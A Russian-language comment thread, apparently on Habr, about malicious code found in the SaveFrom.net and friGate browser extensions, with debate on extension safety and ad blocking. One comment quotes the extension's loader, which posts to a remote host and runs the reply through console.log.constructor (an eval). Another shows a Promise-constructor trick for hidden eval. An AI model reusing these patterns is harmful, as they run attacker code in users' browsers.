Чтобы те кто случайно включил его или установил уже потом, те кто НЕ знаком с информацией о том что расширение опасно. Добавьте маркера в скисок расширений к каждому такому расширению.!!!
А способа запретить eval внутри расширений нет? Ну или у себя внутри всех любителей eval в «подозрительные» записывать.
Расширения для браузера это не скрипт по анимации фоток слева направо. Расширения изначально рассчитаны на то что будут парсить страницу и искать то ли рекламу, то ли скрипты и то режим видимости вставлять в сообщения ВК.
В общем все расширения это каталог костылей которые подставляют под браузер. Модифицирующие браузер и сайты.
Добавьте пожалуйста сообщение в банер при попытке установить подозрительное расширение.
Я многократно пытался установить расширения из ChromeExtensions многократно было сообщение «Установить НЕ УДАЛОСЬ».
Не понятно Почему не удалось, куда не удалось, зачем не удалось?
Очень много расширений например таких как замораживатели вкладок, половина таких расширений не может установится.
Ни сообщения нет, ни причин почему не устанавливается.
А можете примеры таких замораживателей дать, пожалуйста? Посмотрим. что с ними не так.
chrome.google.com/webstore/detail/taboptimizer/cgcmkbkicaeljmcbmblchikjmmlokfag
chrome.google.com/webstore/detail/freetabmemory/ehbifmnhnghckaobolojbabkagnhjajm
chrome.google.com/webstore/detail/tabmemoryoptimizer/mjillkibdjeflldljbgaemfpencpfgkg
chrome.google.com/webstore/detail/tabbooster/fajpbonghcpkhjiiebgdklnkndgjjcch
Я пару раз писал об этом в службу поддержки браузера, мне отвечали что мол это защита браузера.
Не знаю кому написать, так как служба поддержки игнорирует.
Добавить режим отображения ссылок в панели избранного в виде только лишь иконок.
Очевидно что у каждого сайта иконки разные, одной иконки достаточно чтобы было ясно что за ссылка. При этом на панели поместится в 4 раза больше иконок.
На андроиде есть режим отображения иконок на рабочем столе без подписей. А ваш браузер режим показа панели избранного такого не умеет.
Но при группировке или при открытии браузера в узком оконном режиме, ссылки открываются в виде выпадающего списка без названий. А самое главное по таким ссылкам производить поиск НЕ возможно!
Когда я перехожу по ссылке скачать Tox, Electrum, яндекс.Деньги с магазина play.google.com то с этих переходов почему то открывается страница одного и того же кошелька play.google.com/store/apps/details?id=ru.cupis.wallet
Какое то расширение подменяет ссылку.
Расширений много.
Все таки сделайте маркер «опасно!» в списке расширений напротив подозрительных расширений.
.
И! Еще есть такая проблема, в списке расширений браузера нет ссылки на страницу расширения в каталоге расширений.
Проходит время, забываю что расширение означает, а искать его по хешу в каталоге практически нет возможности. часто по одному названию не понятно что расширение означает.
Насчет ссылки мысль хорошая, спасибо. Сейчас она есть в контекстном меню, которое возникает, если кликнуть по иконке расширения на тулбаре браузера.
У меня раширенний более 200, только ~70 из них включены. Остальные как бы могут пригодится на будущее.
Зачем так много, там по пару расширений для каждой функции в результате много получилось, парочку для дебага Juqery, парочку для Ajax запросов, парочку для просмотра видео popup.
…
Чтобы найти зловредное расширение я решил воспользоватся
chrome.google.com/webstore/detail/extensions-switcher/mapmknaogodpakjopdhmdcilahbfbjpc
этим расширением.
Оно позволяет группировать расширения и отключать сразу группу расширений. Кстати это в будущем позволило держать не 70 расширений включенных а только 10.
Проблема в том что это расширение работает в других браузерах.
А в Вашем браузере постоянно выскакивает коно защиты на подтверждение, блокируя весь функционал.
Таким образом я не могу найти звловредное расширение, так как браузер блокирует расширение которое я установил.
.
Что мне делать посоветуете? Как мне найти зловредное расширение? Какой менеджер расширений мне порекомендуете чтобы я помог себе и вам обнаружить зловред?

chrome.google.com/webstore/detail/extensions-switcher/mapmknaogodpakjopdhmdcilahbfbjpc
Например чтобы включить группу расширений, расширение «Extension switcher» всключает легко, но если надо отключить группу расширений, то появляется вот это окно на картинке, А функционально отключается только одно расширение из группы.
А печальнее всего что Сейвфром-то офигеть какой удобный! Есть ли ему альтернативы? После этой статьи рассматриваю вариант вручную вырезать из JS вредоносные части и устанавливать расширение локально. Но это очень ненадёжно…
addons.mozilla.org/en-US/firefox/addon/video-downloadhelper
chrome.google.com/webstore/detail/video-downloadhelper/lmjnegcaeklhafolokijcfjliaokphfk
addons.mozilla.org/en-US/firefox/addon/video-downloadhelper
Если бы он ещё не добавлял свой qr-код на сконвертированное видео. Мало того, что это не слишком приятно, так ещё и для этого требуется перекодировать видео вместо того, чтобы просто слить видео и аудиопотоки.
Когда-то было плагинище для файрфокса, позволяющее добавить в контекстное меню произвольную консольную команду и передачу ей аргументом адреса текущей страницы. Название, увы, забыл, но, кажись — засунуть youtube-dl в PATH, создать такое меню, и это вот оно и будет.
Homepage: add0n.com/external-application-button.html
Chrome Store: chrome.google.com/webstore/detail/external-application-butt/bifmfjgpgndemajpeeoiopbeilbaifdo
Firefox add-ons: addons.mozilla.org/en-US/firefox/addon/external-application
Opera addons: addons.opera.com/en/extensions/details/external-application-button
SaveFrom не использую, но использую friGate Light, и уже давно заметил, что при включении начинает жрать процессор. В первый же день, когда заметил это, нашёл старую необновлённую версию плагина на другой машине, сохранил исходники, и до сих пор пользуюсь. Правда пришлось немного допилить напильником от интеграции с какой-то рекламной баннерной сетью.
До сегодняшнего дня думал, что они пытаются майнить в фоне. Было бы хорошо выложить на какой-нибудь GitHub вылеченную версию от этой проказы...
Имхо, Яндекс должен исключить данный сайт из поисковой выдачи и предупреждать при попытках открыть его браузером, если с него раздаётся вредоносное расширение.
неприятность
Неприятность — это когда мизинцем об стол ударился… А когда целенаправленно впиливают трояна в приложение — обычно это иначе называют.
Кстати, вопрос к разработчикам браузера. У вас нет возможности собирать статистику по работе расширений и давать пользователю отчёт?
Что-то из разряда "модифицировало код на таких-то страницах, ходит на такие-то урлы"?
После прочтения статьи выпилил в хроме и заменил другим, которое (пока) не перечислено в списке скомпрометированных
Спасибо!
chrome.google.com/webstore/detail/unlimited-vpn-proxy-%E2%80%93-unb/cpakggdipddapbfeceakkgdmdlegiajb?hl=en-US
Не знаю, можно ли размещать ссылку
код приведен — даже если яндекс не белый и пушистый, то это никак не умаляет ценности данной информации
По поводу сбора бигдаты — а в чём конкретно претензия? Есть какие-то конкретные случаи явно незаконного/аморального использования этих данных? Или претензия именно в том, что компания, суть деятельности которой именно работа с данными — внезапно вдруг работает с данными?
То, что в нашей строне закон — что дышло, никак не поможет игнорировать запросы от органов, которые оформлены соответствующим образом.
Если к вам с запросом придут, вы скажете, что в России нет правового поля, и поэтому вы запрос выполнять не будете?
Опять рептильно-земноводная ситуация.
С одной стороны, встраивание зловредов со стороны разработчиков расширений, и за такое надо карать.
С другой стороны, они наносили ущерб продавцам контента, которые сами ответственны за выжигаение где возможно инструментов свободного распространения контента, поэтому однозначно осудить их не получается.
Мир сложный :)
С учётом увольнений в мозилле, не уверен, что предпроверка всё еще делается.
ну и всегда есть инструменты разработчика — с их помощью вполне вытащить всё можно
Под андроидом этим пользуюсь.на других ОС на данный момент альтернатив найти не смог
https://vmp.su/
— зайти в музыку
— открыть инспектор сети
— в фильтр ввести «m3u»
— жмякнуть «play» на нужном треке
— скормить получившийся URL вида «cs1-74v4.vkuseraudio.net/.../index.m3u8?extra=...» ffmpeg или youtube-dl:
ffmpeg -i "url" filename.mp3
youtube-dl "url" -o filename.mp3
Сижу читаю и тоже думаю — "Никогда не было проблем с расширениями в тч и сафефромом на огнелисе. Хотя были прикольные, что фигню на стороне творили и из-за этого весь сырбор? ".
Вроде, не так давно у FriGate менялось пользовательское соглашение. Без его принятия расширение отказывалось работать. Может, "расширенная монетизация" как раз в тот момент и началась?
chrome.google.com/webstore/detail/json-viewer-awesome/iemadiahhbebdklepanmkjenfdebfpfe
chrome.google.com/webstore/detail/jsonview/chklaanhfefbnpoihckbnefhakgolnmc
JsonDiscovery тоже не плох, узнал про него из статьи на хабре
https://chrome.google.com/webstore/detail/jsondiscovery/pamhglogfolfbmlpnenhpeholpnlcclo
А есть баунти программы от яндекс браузера в поисках вредоносных расширений?)

Каким образом не установленное и не скачанное расширение включалось без интернета, и как можно удалить то, что не установлено?
Я не могу понять логику. Вы показываете пользователю «витрину», в которой зачем-то не афишируете, что это стороннее расширение, назвав кнопку «скачать и установить» почему-то просто «включить». Из чего я например сделал (как выяснилось ошибочный) вывод, что это расширение — часть браузера.
Так еще и потом не давали возможность удалить это расширение, если я хоть раз его включил, пока вдруг не оказалось, что оно вредоносное.
Вы можете как-то пояснить, зачем вы так делали? Какие были причины?
Давайте я ещё раз объясню логику:
1. есть витрина, стор расширений. На ней есть несколько расширений, это просто буквы, их кода нет на вашем телефоне, пока вы не нажмете кнопку включить или установить.
2. если вы нажмете включить/установить, код скачается, расширение установится, и появится возможность его отключить. Удалить с витрины расширение нельзя.
3. с этой витрины мы убрали savefrom, после того, как обнаружили то, что в посте.
4. ниже под этой витриной список установленных (включенных либо отключенных) у вас расширений, откуда вы можете их включать, выключать и удалять.
есть витриналюбопытно, а предиктивное кеширование (или как там сейчас правильно называется кеширование того, что по мнению браузера может захотеть скачать пользователь) не скачивает ли заранее плагины с витрины — это могло бы объяснить, что ganzmavag смог включить плагин при отсутствующем интернете
Вот сейчас например у меня есть одно ранее установленное расширение — я его тоже удалить не могу, нет такой кнопки.

4. ниже под этой витриной список установленных (включенных либо отключенных) у вас расширений, откуда вы можете их включать, выключать и удалять.
Так не могу удалять, в этом-то и странность. Я ниже скриншот привел — там есть только кнопка «Выкл» у расширения, которым пользовался один раз. И с SaveFrom точно также было — кнопка удалить появилась только после этого поста на Хабре, и то с опозданием. Версия Я.Б при этом самая актуальная.

Давно заменил Savefrom на "ss" в адресной строке, а Frigate включаю только при заходе на блокированные сайты. В начале года тоже мучился такой внезапной рекламой, даже к своему провайдеру обращался.
Думал уже, что вирус-троян какой-нибудь подхватил.
большинство пользователей не проверяет
И даже большинство программистов не проверяет!
Сложность современных устройств и программ требуют настолько узко специализированных знаний, что, например, высококлассный программист микроконтроллеров не в состоянии оперативно разобраться в каком-то плагине браузера, и наоборот!
Прошли те времена, когда программист знал всё. Сейчас, чтобы вникнуть в предметную область, нужно потратить месяцы.
Как вы предлагаете наказать разработчиков Яндекс.Браузера и его стора? )
Стоило об этом хотя бы сказать. И заодно принять меры по улучшению модерации этого каталога и явно побанить там мутные вещи вроде обфускации
Яндекс не хочет сам себя наказать как то?Почему вы предлагаете наказать именно яндекс, а не разработчика вредоносного ПО? Только потому, что яндекс вот он, а разработчика иди ещё найди?
По моему, так люди, которые ставят расширения, слегка безумны (а те, которые в комментариях тут рекомендуют альтернативные расширения или ждут, что кто-то удалит из них рекламу — наивны). Ведь расширение это по сути бекдор в браузере, оно имеет доступ ко всем вашим секретам. Оно может лайкать от вашего имени проправительственные посты в соцсетях, сливать ваши пароли и переписку, видеть страницу вашего интернет-банка. Потом ваши данные окажутся на черном рынке. Стоит ли возможность скачать какое-нибудь глупое видео того?
Неужели вы верите, что расширения разрабатываются за бесплатно без монетизации?
Потому я не ставлю никакие расширения в браузер. Особенно, когда есть youtube-dl, который может все то же, но без бекдоров.
Также, я бы на месте разработчиков браузеров принял бы запрет обфускации кода и сетевых данных, передаваемых расширениями. Пусть либо пересылают данные в открытую, либо сразу получают бан.
Особенно, когда есть youtube-dl, который может все то жеСкажите, как при помощи него скачать отдельный трек из ВК?
(а как только надоест извлекать ссылки через такое место — садитесь и пишите юзерскрипт для tampermonkey, который будет это делать за вас :)
выделение текста на ссылках
А разве выделение текста мышью с зажатым Alt — это не стандартный функционал, который работает практически везде? Или я вас неправильно понял.
Некоторое время назад мы добавили монетизационного партнёра, который должен был собирать неперсонализированную аналитику пользователей. При изучении кода интеграции, мы не обнаружили злонамеренного поведения.
Но кроме сбора обезличенныйх данных он, по всей видимости, использовал встроенный код и для прокрутки видео-рекламы в скрытой вкладке.
Благодарим специалистов Яндекса, что обнаружили потенциально опасный код.
Сейчас этот партнёр удалён из кода наших продуктов, и в будущем мы его добавлять не будем.
Все решения, которые принимает наша команда, исходят из логики — user first, и мы ценим персональную информацию пользователей и их бесплатный доступ к услугам нашего сервиса, которыми они пользуются.
Ну, знаете, чтобы другие так же не вляпались?
Ведь в настоящий момент страдает ваше доброе имя. Откуда клиентам знать, был ли там вообще какой-то «партнёр»?
Некоторое время назад мы добавили монетизационного партнёра, который должен былсобирать неперсонализированную аналитику пользователейкрасть личные данные пользователей.
Может кто объяснить, с чего вдруг сбор (воровство) информации пользователя стало нормой? Раньше ПО, которое такое делало, считалось вирусом и оказывалось в базах антивирусов.
Под понятием «неперсонализированная аналитика» может скрываться все, что угодно не содержащее ФИО пользователя. Неперсонализированной могут называть историю браузера + уникальный ид пользователя.
от чего она в данном случае защищает?
Почему мы должны верить, что Вы действительно имеете отношение к SaveFrom.net и уполномочены делать заявления от их имени?
Знаете, как это вас характеризует?)
Выбирайте по вкусу:
1) преступная халатность;
2) мошенничество (напомню — «злоупотребление доверием в корыстных целях»), по предварительному сговору, группой лиц.
https://chrome.google.com/webstore/detail/frigate-ua-for-ukraine/biokbpahnhnolgnfoblfflgopeepaoik
Стоит ли пользоваться продуктом у которого в названии friGate написан — как сами думаете?
С другой стороны, если для того чтобы изредка глянуть почту, одноглазники, вк, и т.д. — то поставить отдельный браузер с этим плагином (лучше в отдельной виртуальной машине, которую откатывать к настроенному состоянию), и почти пофиг, есть ли там вредоносы
Да и реклама во время просмотра видео тоже показывается.
- Чтобы впечатлить рекламодателя большой посещаемостью. Кто-то платить за переходы, кто-то за показы, а кто-то фиксированную сумму кое-как увязанную с количеством уникальных посетителей в последнее время.
- Если кинотеатр платит правообладателю пропорционально количеству просмотров фильма, то и у правообладателя появляется мотив.
Дальше понятно, думаю.
То есть вы правда думаете, что защита от блокировщиков рекламы является более предосудительным делом, чем собственно использование блокировщиков рекламы?
Как сайтам зарабатывать? Это не проблема пользователя и не его ответственность. Хабр, как и большая часть других сайтов, не пытается ничего обходить, и как-то выжил.
Это моё устройство, и я решаю, какой код ему можно загружать и выполнять, а какой нельзя.
Вас насильно никто на сайт с рекламой не затаскивает, вы на него сами добровольно заходите. В данной ситуации владелец сайта вам ничего не обязан. Он предлагает вам пользоваться сервисом взамен на просмотра рекламы. Вы же сервисом пользуетесь, свою часть сделки не исполняете, да ещё и жалуетесь, что владелец сервиса вас в этом не поддерживает.
свою часть сделки не исполняетеЯ какой-то договор об этом подписывал что ли? Не подписывал — значит никаких обязанностей по отношению к владельцу сайта у меня нет. Как, впрочем, и у него по отношению ко мне.
сервиса вас в этом не поддерживаетНе «не поддерживает», а «целенаправленно активно мешает, используя свою уникальную позицию как владельца крупной рекламной сети».
Да и сама реклама. Она на меня не действует, от слова совсем. Для меня это бесячий информационный шум. Есть люди, на которых она действует. Есть те из них, кто осознанно не ставит блокировщики, и даже говорят, что реклама им полезна. Какого полезного эффекта по задумке владельца сайта должна достигнуть такая насильственная реклама — непонятно, но она уж точно не заставит меня заинтересоваться рекламируемым товаром. Разве что яндексу в своём же директе просмотры накрутить. Отсюда напрашивается вполне логичный вывод, что это делается исключительно для того, чтобы мне насолить.
С моральной точки зрения, очевидно, халявщик — это владелец сайта. Ничего не делая, ведёт себя как спамер, прикрываясь тем, что вроде как не настолько навязчиво (но некоторые не делают даже и этого, когда в десятке попапов от контента остается меньше четверти экрана).
С моральной точки зрения, очевидно, рекламы вообще существовать не должно — не только в Интернете, но и в реальной жизни. Это как если бы я пришел в библиотеку, а мне вместо запрошенной книги выдали сборник рекламы. Или когда я иду по улице, а мне начинают орать в ухо и совать в руки зазывалы из магазина рядом. Или как если бы я получал тонны геббельсовской пропаганды в газетах, на радио и телевидении.
С моральной точки зрения, очевидно, рекламы вообще существовать не должно — не только в Интернете, но и в реальной жизни.
Любой способ бизнеса донести до людей информацию о существовании своего продукта можно расценивать, как рекламу. Если такого способа не будет существовать, то загнётся любой бизнес, продукт которого не является физическим и не выставляется непосредственно на продажу на конкретном рынке или в конкретном магазине. Если последнее (выставление на прилавок) тоже рассматривать как рекламу, которой не должно существовать, то загнётся любой бизнес. В этом случае люди смогут получать продукты только от государственных поставщиков, причём только заранее точно зная, чего конкретно хотят. Конкуренции не будет. Разнообразия продуктов не будет. В лучшем случае будет государство, предоставляющее фиксированный набор заранее известных продуктов.
P.S. Я сам не любитель рекламы, и считаю, что в текущей ситуации встречается немало аморального использования рекламы. Но, конечно, не могу считать концептуально саму рекламу аморальной. Хотя… Могу, но тогда буду вынужден считать аморальным частный бизнес любых направлений и масштабов; деньги, конечно, тоже. Единственный моральный вариант такой реальности, который приходит в голову — все работают бесплатно и исключительно по желанию; все получают всё, что хотят и когда хотят — опять-таки бесплатно. А максимально моральный вариант — когда каждый всегда точно знает, чего хочет, и для каждого без всяких усилий немедленно реализуется всё, чего он хочет, и не реализуется ничего из того, чего он не хочет или не хотел бы. Было бы круто! До тех пор практически реализуемая мораль должна считаться с вопиющим несовершенством человеческой реальности. Имхо.
халявщик — это владелец сайта. Ничего не делая
Ну он сделал что-то, что заставило вас придти на этот сайт — наполнял его контентом, привлекал пользователей (если там есть коммунити), оплачивал хостинг.
В данной ситуации владелец сайта вам ничего не обязан.
Как и я ему. Я не обязан читать весь контент. Имею право читать выборочно.
жалуетесь, что владелец сервиса вас в этом не поддерживаетЭто да.
Вас насильно никто на сайт с рекламой не затаскивает, вы на него сами добровольно заходите
Ничего что может не быть тупо альтернативы? Потому что альтернативу — задавили тем или иным путем.
Либо (что реже но бывает) именно — затаскивают, пусть и не владелец сайта (например «в рамках обучения вам нужно изучить следующие ролики на youtube....»/«новости и оповещения (обязательные к просмотру) публикуются в группе XXX вконтакте»).
При этом варианта заплатить деньги за убирание рекламы как минимум — может просто не быть (у гугла с почтой — он хоть есть, в лице G Suite, у Youtube — есть подписка).
Скорее так:
- Владелец ресурса предоставляет доступ к данным на своих условиях (аналог лицензионной программы);
- Юзверь не хочет "платить" (загрузить и посмотреть рекламу) и пользуется "кряком" на ресурсах, которые требуют этого (блокировщиком рекламы, бан листом в etc/hosts, и т.п.).
Посещая ресурс вы заходите в частную лавочку, где владелец царь и бог в рамках закона (умышленное распространение троянов, если я правильно помню, немного наказуемо).
Не нравится ему, что вы нагружаете его сервера и не платите, он вас выгонит в рамках закона. Но и вы вольны в рамках закона вытворять всякое в его лавке.
Закон там ещё не устаканился, но я сомневаюсь, что владелец лавки в ней же будет иметь меньше прав, скорее наоборот.
Это примерно как сдавать свое внимание по расценкам вторсырья.
А при любых альтруистических действиях ценность пользы, которую получит другой должна быть больше, чем мои затраты, иначе зачем я это делаю.
Поэтому совесть не мешает мне блокировать рекламу. Лучше поддерживать достойные проекты донатами.
второй раз радуюсь, что перешел с хрома на яндекс))) Первый раз радовался приложению и удобной более-менее интеграции переводчика в браузер)
Хорошо бы, чтобы это закончилось уголовным делом.
Далее идёт большой switch, который ответственен за загрузку и выполнения JS-кода.
Очень похоже на трансформацию асинхронного кода через Babel
Пошел смотреть список установленных в браузере расширений. Обнаружил следующее:
Yandex Elements: Weather (это значок, который температуру воздуха за окном показывает)
- Read and change your data on the websites you visit
- Determine your location
- Read and change your browsing history
- Display notifications
- Read and change your bookmarks
- Manage your apps, extensions and themes
Та же фигня в Yandex Elements: mail, который я использую для того, чтобы видеть, сколько непрочитанных сообщений у меня в почтовом ящике.
Задумался.
Yandex.Metro would like to find and connect to devices no your local network — это на айфоне. Можно смело утверждать, что данный пост о борьбе с медом опубликовали чем-то недовольные пчелы.
После этого они смогут принять осознанное решение и при необходимости включить их вновьприятно удивился.
И да, уверен что большинство включит. Ибо скачать ролик пользователю важнее чем какая-то безопасность. Самые ловкие выключат после скачивания.
ps. не знал что так можно xD
> Promise['constructor']('console.log(1)')()
сегодня вы мне помогли, а то я бы ещё полгода бы ломал голову.
на оперу чуть не перешел. респект!
«13 июн 2019… Использование SaveFrom.net в Яндекс.Браузере. По умолчанию данное расширение является предустановленным в Я.Браузер, а это...»
в основном браузере, давно не использую никаких загрузчиков, так как все к которым я заглядывал под капот, делали больше чем должны…
$.post('http://somesite[.]ru/ext/stat?' + $.param(params), function (res)
{
res && console.log.constructor(res)(); // это eval
});
— к загрузке кода из вне (не точно)
— внедрение генерированного кода во вкладки (только функции и файлы самого расширения)
— к построению DOM из бакграунда (так как будет только воркер)
Это усложнит внедрение непроверенного кода, но я считаю что расширениям нужно предоставить полный карт-бланш, но спрашивать для всего разрешения у конечного пользователя
в будущих спецификациях Manifest V3 у расширений не будет доступа:Это уже давным давно реализовано, и даже больше, в curl. А расширения к браузеру должны иметь больше функционала, иначе они будут бесполезны
А сделать рекламу неблокируемой можно уже давно (шадоудом + проксирование)
Разработчик указывает ссылку на git-репозиторий с исходниками. Всё.Пользователи проклянут вас на убиение кучи проприетарных дополнений.
А вот фригейт заподозрил,… нашел где-то что другие тоже его заподозрили… но на всех ресурсах его по прежнему советовали
я пробовал заменять на «блокировки рунета»… но там свои прокси надо для несписочных сайтов.
А теперь вдруг как открытие… странно что раньше шума не было… при том что я не спец а ламер по большому счету…
Гораздо интереснее было бы прочить как SaveFromNet вообще оказался в браузере. Он ведь изначально не совсем для легальных целей использовался.
(и вообще по закону ж можно (распространять нельзя если не fair use) а правила сайтов — а зачем читать).
Так что Savefrom ручками ставят по гайду на сайте (там процедура чуть запутаная).
Самим поставить — это одно. И когда Яндекс дает его всем из коробки — это несколько другое.
скачивыть ролики с youtube/vk — это легально.
Потому что, да. Далеко ходить не будем, yt-dl машет ручкой именно Вам месяц назад от вашего комментария. Ноябрь месяц.
xakep.ru/2020/11/16/youtube-dl-reinstates
Что за виджет?
Боковая панель — удивительно бестолковое изобретение Яндекса. Всплывает при наведении мыши к левой стороне экрана, жутко бесит, и совершенно не учитывает варианты с 2 мониторами. Отключаю эту штуку сразу. Разработчикам Яндекса нравятся всякие всплывающие штуки. С парольным менеджером такая же фигня. Окошко его не просто появляется, а, зараза, "плавно", а потом еще так же плавно исчезает. И так пока вводишь логин и пароль 3-4 раза всплывает и уплывает.
Панель очень удобна, если ее закрепить на экране в постоянном режиме. Там отличное управление вкладками, музыкой, быстрый поиск по истории и закладкам, плюс недавно появилась панель приложений, куда можно вынести любимые веб-аппы.
А про парольный менеджер можете пожалуйста чуточку подробнее? Которое окошко медленно выплывает? Саджест подстановки/сохранения пароля у поля ввода?
Я не сомневаюсь, что разработчикам, сидящим на работе с 40-дюймовыми мониторами, это удобно. Должно же быть какое-то разумное объяснение тому, что на мой экран они постоянно пытаются что-то впихнуть. В мобильном браузере уже даже пальцем ткнуть негде, от контента и поисковой строки не осталось ничего. В десктопной версии пока еще немного места для контента осталось, но со временем эта недоработка, я уверен, будет устранена.
Есть версии кто это может быть?

aapocclcgogkmnckokdopfmhonfmgoek: Slides: version 0_10
aedipmheomnpcbgmanofhaccebgapije: WebSpy: explore and test website: version 1_3_22
ahfgeienlihckogmohjhadlkjgocpleb: Web Store: version 0_2
aogjlhjkkcihgimccdodibjmpkpmgpad: Фейкогриз: version 0_0_12
aohghmighlieiainnegkcijnfilokake: Docs: version 0_10
aopohcdookcahpobjnopnkgieaolmplk: Учи сам. Сообщество изучающих иностранные языки.: version 2020_11_5_24174
apdfllckaahabafndbhieahigkjlhalf: Google Drive: version 14_5
blojlgglhfcmpigjbkllcgjmhincdjhb: Snow Web Application Metering: version 1_0_4
blpcfgokakmgnkcojhhkbfbldkacnbeo: YouTube: version 4_2_8
cfhdojbkjhnklbpkdaibdccddilifddb: Adblock Plus — free ad blocker: version 3_10_1
cjpalhdlnbpafiamejdnhcphjbkeiagm: uBlock Origin: version 1_31_2
eemlkeanncmjljgehlbplemhmdmalhdc: Chrome Connectivity Diagnostics: version 1_2_1
epcnnfbjfcgphgdmggkamkmgojdagdnn: uBlock — free ad blocker: version 0_9_5_25
felcaaldnbdncclmgdcncolpebgiejap: Sheets: version 1_2
fgmbnmjmbjenlhbefngfibmjkpbcljaj: Highlight This: finds and marks words: version 5_2_2
gfdkimpbcpahaombhbimeihdjnejgicl: Feedback: version 1_0
ghbmnnjooekpmoecnnnilnnbdlolhkhi: Google Docs Offline: version 1_21_0
kbfnbcaeplbcioakkpcpgfkobkghlhen: Grammarly for Chrome: version 14_990_0
kcpnkledgcbobhkgimpbmejgockkplob: Tracking Token Stripper: version 2_6
klbibkeccnjlkjkiokjodocebajanakg: The Great Suspender: version 7_1_8
kmendfapggjehodndflmmgagdbamhnfd: CryptoTokenExtension: version 0_9_74
laankejkbhbdhmipfmgcngdelahlfoji: StayFocusd: version 1_6_0
mcbpblocgmgfnpjjppndjkmgjaogfceg: Take Webpage Screenshots Entirely — FireShot: version 0_98_98
mfehgcgbbipciphmccgaenjidiccnmng: Cloud Print: version 0_1
mhjfbmdgcfjbbpaeojofohoefgiehjai: Chrome PDF Viewer: version 1
neajdppkdcdipfabeoofebfddakdcjhd: Google Network Speech: version 1_0
nkeimhogjdpnpccoofpliimaahmaaome: Google Hangouts: version 1_3_15
nmmhkkegccagdldgiimedpiccmgmieda: Chrome Web Store Payments: version 1_0_0_5
noaijdpnepcgjemiklgfkcfbkokogabh: ImTranslator: Translator, Dictionary, TTS: version 15_71
oldceeleldhonbafppcapldpdifcinji: Grammar and Spell Checker — LanguageTool: version 3_2_3
pjkljhegncpnkpknbcohdijeoejaedia: Gmail: version 8_3
pkedcjkdefgpdelpbcmbmeomcjbeemfm: Chrome Media Router: version 8720_1005_0_2
Чо списком из статьи не пересекается.
Это может быть не расширение, а задача в планировщике винды или малварь. Стоит проверить антивирусом.
Антивирус стоит.
Хотя полистая примеры с форума, по логу можно и самому сообразить.
Каждый дефект ПО, как правило, исправляется по 2 направлениям. Сначала делается быстрофикс. Это комплекс мер, чтобы устранить сиеминутные проявления ошибки, чтобы пользователь смог получить тот результат, который ему нужен прямо сейчас.
Затем уже, когда основная острота симптомов снята, делается окончательное исправление. Проводится анализ причин, приведших к возникновению ошибки, и принимаются меры по устранению этих причин. ПО нужно доработать так, чтобы больше такая ошибка и аналогичные ей ошибки не возникали.
В статье описан лишь 1-й этап — лечение симптомов. Хотелось бы увидеть, какие планы у разработчиков по устранению предпосылок к возникновению таких ситуаций. Пока все выглядит так, что ничего не поменялось. Разработчики расширений имеют право делать все, что захотят, но так, чтобы пользователь не почувствовал. Возможно, осталось еще много расширений, которые сливают пользовательские данные, исполняют произвольный код, но просто их командные сервера еще не присылали своим ботнетам команду на проигрывание видео.
А большие компании это плохо для клиентов. Хорошо, когда компании маленькие, и для каждого продукта их много конкурирующих. И каждая может загнуться в любой момент, если разочарует или разозлит пользователей :)
Вопрос к Яндексу — возможно ли реализовать систему разрешений для расширений? По аналогии с разрешениями приложений в сторах. Такой подход решил бы проблему с произволом расширениями более глобально.
Быстро было принято решение.
Первый шаг: HLS. Плееру отдается M3U8, в нем медиа разбито на 3х секундные отрывки (чанки), плеер его воспроизводит. Но эти «гады» сломали, и опять качают медиа…
Второй шаг: плееру отдается HLS с рандомным шифрованием чанка, т.е. при воспроизведении 9 минутного трека мы получаем плейлист из 180 трехсекундных медиафайлов, часть которых идет в оригинале, часть зашифрована в AES-128, часть в AES-256. Опять сломали, да еще и палками закидали, что юзеры жалуются, что дешифровщик жрет CPU при проигрывании. Новости об этом конечно же удалили, даже в кэшах найти не могу, молодцы.
Что остается делать? Купить SaveFrom, Yt-dlи прочих, запушить в них майнеров/троянов, провести «расследование» и запретить. А то вдруг кто-нибудь прослушает трек без рекламы или скачает видео)
Данное сообщение не спонтанное, у меня уже куча самописного софта, чтобы банально накидать музыки на флэшку для прослушивания в авто, а борьба эта идет уже пару лет как минимум
Это что, бесплатный ВПН продает своих пользователей и используется для фрода? Как так, не может быть, не верю
Сегодня мы приняли решение отключить расширения SaveFrom.net, Frigate Light, Frigate CDN и некоторые другие, установленные у пользователей Яндекс.Браузера. Совокупная аудитория этих инструментов превышает 8 млн человек.
Ложь.
Frigate уже как две недели МИНИМУМ не работает / отключается браузером.
Сначала из стора пропал. Решил с со стора хрома поставить — работает буквально минут 10-30 и отключается опять (или удаляется, не суть).
Пришлось ставить Хром, перетаскивать закладки и остальное.
Яндекс снесли.
pikabu.ru/story/google_otklyuchil_frigate_v_chrome_vsled_za_yandeksom_7929625
«Они говорят: им нельзя рисковать,
Потому что у них есть дом, в доме горит свет.
И я не знаю точно, кто из нас прав,
Меня ждет на улице дождь, их ждет дома обед.»
Они «любят жизнь». И продадут всё что угодно, только бы «Остаться в живых...».
Я не «последний герой», я против «капитализма» (читайте Маркса), и считаю, что «Никакая игра не стоит свеч, кроме одной. Свечи игрока».
В общем — программисты, работающие над вышеупомянутыми расширениями — ОЧЕНЬ НЕХОРОШИЕ ЛЮДИ. Всё. Дальше молчу.
Лично для меня это большая потеря этого расширения т.к.он был удобен во всем, и нет ни одного такого же аналога как по интерфейсу удобности использования так и по пользованию прокси, какие впн ща не наустанавливал ни один не открывает так быстро страницы как открывал фригейт, и к тому же огромный плюс фригейта был в том что он в включенном режиме врубал прокси лишь на те сайты на которые мне нужно,(я сейчас про frigate3 proxy helper), и если сайт не открывался то в два клика по расширению можно было добавить сайт.А эти бл*дские впны не умеют работать как фригейт3 и приходится вручную добавлять теперь в вайтлисты сайты на которых мне прокси не нужен, только вот в быстроте открытия страниц все равно впны открывают их долго что значит они все равно юзают прокси даже если добавляешь в вайтлист сайт либо у меня шуе уже полное, но блин.**Есть какие нибудь способы врубить фригейт?**мне пофиг на троян или что там, мне не принципиально что он там видосы майнит или еще чего, комп никогда не тормозил, но то что хром(пользуюсь только им) в наглую просто лишает возможности врубать впн из-за какого то кода, это сверх идиотизм, лично для меня.
Например, это можно сделать прямо на роутере: VPN Policy Routing в OpenWrt, управление маршрутами в KeeneticOS, либо на компьютере под управлением Windows или Linux.
Кроме того, есть бесплатные Antizapret / Zaborona, владельцы которых уже сделали это всё на своей стороне — через них идёт трафик лишь до заблокированных в России / Украине ресурсов.
